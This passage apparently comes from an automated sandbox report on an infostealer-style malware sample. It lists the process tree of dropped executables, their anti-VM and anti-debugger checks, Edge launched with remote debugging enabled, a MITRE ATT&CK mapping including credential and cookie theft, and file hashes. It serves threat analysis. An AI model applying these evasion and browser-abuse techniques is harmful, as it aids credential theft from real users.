        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff84c4d46f8,0x7ff84c4d4708,0x7ff84c4d4718
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1168
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        6⤵
        
        PID:3332
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4092
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
        6⤵
        
        PID:216
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2664 /prefetch:2
        6⤵
        
        PID:3400
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4740
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:408
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2656 /prefetch:2
        6⤵
        
        PID:2792
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2712 /prefetch:2
        6⤵
        
        PID:4836
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3280 /prefetch:2
        6⤵
        
        PID:3520
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3280 /prefetch:2
        6⤵
        
        PID:2144
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4000 /prefetch:2
        6⤵
        
        PID:4600
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4628 /prefetch:2
        6⤵
        
        PID:4560
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5040
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3640
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
        6⤵
        
        PID:5044
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1712
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2148
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5072 /prefetch:2
        6⤵
        
        PID:4976
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,11828629241111407951,11858038067835951397,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4340
  - - C:\Users\Admin\AppData\Local\Temp\II7QTU1Q7Z0YTKGI.exe
      "C:\Users\Admin\AppData\Local\Temp\II7QTU1Q7Z0YTKGI.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3244
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E61p.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E61p.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3660

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4292

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4296

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:116

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 740 -ip 740
1⤵
PID:2156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3184

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1468

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:4308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GIJJKKJJ

Filesize
114KB

MD5
fd3344f480983e41adf598d1bd4fc238

SHA1
5bd74fd01f7e6dc37c999af70e8c9dce47e10b18

SHA256
1bf3a83ee64b9c2e922caa9298a28661c842847e1de1d624cb117a5ccadf8cdd

SHA512
22bf510da77595383f26d187bbbbac608c483e9edbe8114206a8b2ac49e2172f0ae75f3fde59991665defcd27be081cecaa66d9e8f6c93dd2e820aa3cd116d11

Download Submit
C:\ProgramData\KJEHCGDB

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

Filesize
329B

MD5
2379ee518cd4d47b158341efca9fe0b7

SHA1
ef517a473153fc99a3911f1a49a9aa2a50e85a91

SHA256
0388a425b458ccbdaa10099afa6afa1fd3dcb5c0888fd22390954cbcab678c6b

SHA512
af039556769f07f5434d4329aab874334536bd74b394bbbc8444bc88ba3beb9c68d0165d919ac59abe950b9f3a78b3ab71260948a485eb9e77a900d4855a7897

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG

Filesize
317B

MD5
7fed585de7fb4a4c10c9de695b5a5302

SHA1
88b6d5fd8e7f200ffb943f7a0ae4053d6cd9d51c

SHA256
8c0cf72ea155f3939f358da643fbe06f75c691cb3fb8eccbd195b7941091da61

SHA512
cc4ceb92966f65dc6056c5140803676072506a1ea504894fdc5bae2f78d37064d0e011b1f98ea81b7f15382cd173540af94e4566971deeb4cb4affcce5039abb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
1KB

MD5
00952572126290a9eac280bcd66d87a8

SHA1
aa60f1390e165e0c5fbf14d001405d9f38015f4b

SHA256
ebcf93f50231f3e1ede68a34c58bb8ec39898f46f41c8b32175c068d38e723f5

SHA512
456600830a8238fc8988b9a98622ce18e1e86b8ea43acb2473f437a19b13b64201e2e396dad374867f01f1b9739c990cf8106d7d5358b9b906a2031c5ac3a856

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG

Filesize
335B

MD5
91f409024878b95cde2dc8db12757777

SHA1
b20f436c254bc0a404d97af426236119fc36df2b

SHA256
6918c916722f2e66d09438b12093921f7fba39e0d4fd76471bd0fe96c7de89df

SHA512
4e012c76e5b29a1a3041a8236d7448485aef7559821255a995b29cdfd8453faa037831b1880b43cc60222d5f49dba2053ca6dce7bb48eeac47aaeacb895d4f2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

Filesize
14B

MD5
ef48733031b712ca7027624fff3ab208

SHA1
da4f3812e6afc4b90d2185f4709dfbb6b47714fa

SHA256
c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99

SHA512
ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
127KB

MD5
3b05dc92bc97cd57488e14f8b71534e8

SHA1
f0a0d4befbc938f5500cbdd2df335637f08a82c7

SHA256
a4809de28e980403d68583e3644a104db27c2a393022526de6abde242be16fa8

SHA512
65f2e0d41d9c8f2ea1c8acd7dfa1323872269ab6e985655ce8f50faa1df1b9cb2ef4a73b9c5cff9e7af6247768ad767dfe9054edcaafbffb38f1eb1bacec5a57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
19a7f42782b4e728bb12731ff9a460f6

SHA1
495d51f1a8fa8b55063f307f919f3bc6d67af241

SHA256
126eee474c67271293ded1ff06e56bab87c21c0884d22a419fb40e4bc87cacba

SHA512
50f21223f1b013c727b26327976f74faa11ec830f6d540eee02d728d9d7b9b617e0b48b63c7b9ebf248d818e5c65bd6e4007e2352f9f59e182c4625a28b28f0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
08edd5c04b02f0b7175bcda703fd0f38

SHA1
d4f1968dd481ea01a4023b1ad333e16115cb0e18

SHA256
afbae8fd296e93092ced684ac3683e56b28a3e809fe952fab4c9116995dfec09

SHA512
474dbd8d089b549cb68585a2657486f35b8aff0b644bceca10714077c4149b84e5d910d4fda400beca016ac83620d8627d2b0ce7cac292fda7c45f3abaea1379

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
350edaceb21dd0d71d16b090f386f82a

SHA1
05dca54b21365bceaf384266138586989373f075

SHA256
420783b0cbe275a8e2df796d48b12449abceb7629b72122a14bb8f7f02a0d6a5

SHA512
6accdf9b22a0ff7dc3baba5917aa7ece39b80b94664412b433ea2b3f150b9b8b269618ee711c02bc80e26ab923a2b3a37e209855192e2ce0264fa2febb256196

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
807196e0dfcf59fbe2dd17317d904c19

SHA1
ce43f4616b2b64b7d144b8e9c00bb5cb81938f4c

SHA256
ba37bd01ac813974aa0ed471538cffd097d92a5f3385ea5de6b720780a4e1737

SHA512
24a2a9a5a056fe41717b905130c2e4d489c0a3a6f6866f330cee23691c12761cb8202767c446424d8b80ded22fb95c5524f700a12c5d544928ed96517daa2188

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\1075597001\BwStzYG.exe

Filesize
657KB

MD5
bdc51a1e2b603e81cf981830d035e042

SHA1
dac044f8a311e09f2db699c0a59f59664065f93c

SHA256
60d9571eb53e31b25680d7008a4a7f09e55a93b4543d5e34ee4038eb960c3146

SHA512
1017f1a9c66543a62baeaca698d2dff9d655943a0e7f15d8e887f0c22192d32601225c02b74667b9b12ec43add953a0f4e0de20088bd8ae3e157ef15113e0cd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1075681001\Ubrlj6S.exe

Filesize
2.7MB

MD5
032f2e9ef6b95a08483283d3901e25b4

SHA1
8c3390a9ab98f36c3202c83eec3ba10c25b67eb7

SHA256
b18c61d9c5e8375d870516f616d1145a4496411c1b914f692620973decf8688a

SHA512
8cec41284bfe1c841316a081df8f9b75ebb3e2b44741468bd3883987a3607a19011b426f367810ae0829395c8a06c26a8985ed5a34d3aa97bfb65c179e7dcdf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1075826001\amnew.exe

Filesize
429KB

MD5
22892b8303fa56f4b584a04c09d508d8

SHA1
e1d65daaf338663006014f7d86eea5aebf142134

SHA256
87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

SHA512
852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

Download Submit
C:\Users\Admin\AppData\Local\Temp\1075841001\PNYmoTn.exe

Filesize
895KB

MD5
1f96747d29d7049a83138d9ef6178600

SHA1
d2605204634a2740c3b2bf8f91a0f162fa68e155

SHA256
55c9a84c31a73130b61b28451a058d2b2240686b05499ff4d9d253e76cb88bd8

SHA512
5134972185cb9b15e990e99e13b6931172d33ac8e554fa6aaa98631b7dc8dff6134da0081213e290c54428fe7806a1571f05fe3781d1459e4dd136435b7f8014

Download Submit
C:\Users\Admin\AppData\Local\Temp\1075842041\tYliuwV.ps1

Filesize
880KB

MD5
1c611166768934709414e86420907d9e

SHA1
6f2d29019332f417f2c36e09adc68dade71fa71a

SHA256
18cb8d4b430b8c6f45e050534e73d8c914f1e0be92a33270b87796f5bd217205

SHA512
be1c3a69440f2c7d2aacae4449f92888c427daec3420a56554daeea30e0750bb048fa95ce4c3b1dd4eb56abfd3a52862f7106f361a8b91eb9c1aa6350bd78d45

Download Submit
C:\Users\Admin\AppData\Local\Temp\G4U5LL9FQR9AW5P9DYERDF1XLOI9D.exe

Filesize
1.7MB

MD5
481ea64bf8abffb876b2329201a4868e

SHA1
4c480e184f5f29f289dc6ac2e1792a58a0265a05

SHA256
7a854272d3eb38e57ff6bfa01f11155b3e4419f9cf537c39a59486874b47e09e

SHA512
610d994a48e064cbf162a50e78de4d872de7c64ecd46532fe7bf049cd687157584df030f2b5865780e200842dd006d07399b3158129761c746e17053be7f57e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\II7QTU1Q7Z0YTKGI.exe

Filesize
1.8MB

MD5
fb8fa5e59818145972b5108627a8ddb0

SHA1
4cdbd2625d5b324f32f94cc6c3d59eea723a38fc

SHA256
4b4eb2445c7088195b55bc3d38eef1d70b14975a3682a846399baaa89b6d3b99

SHA512
db5ad2db0850789ca34964ef86c87d849b6892948ff5e81fa0236438dc16d3610a7a697f61b40a1885195215f75eefea96d9559ea8abffe7296257fab5c6e737

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E61p.exe

Filesize
1.7MB

MD5
ffe913df5ffe48d6e73f144bb3b730e9

SHA1
259da8a5b27c1d32f345936873213e7a7edd08bc

SHA256
2165984f24da970fd8c1f200ac75471d151cae8409cb20787d2e98e9fc4e102c

SHA512
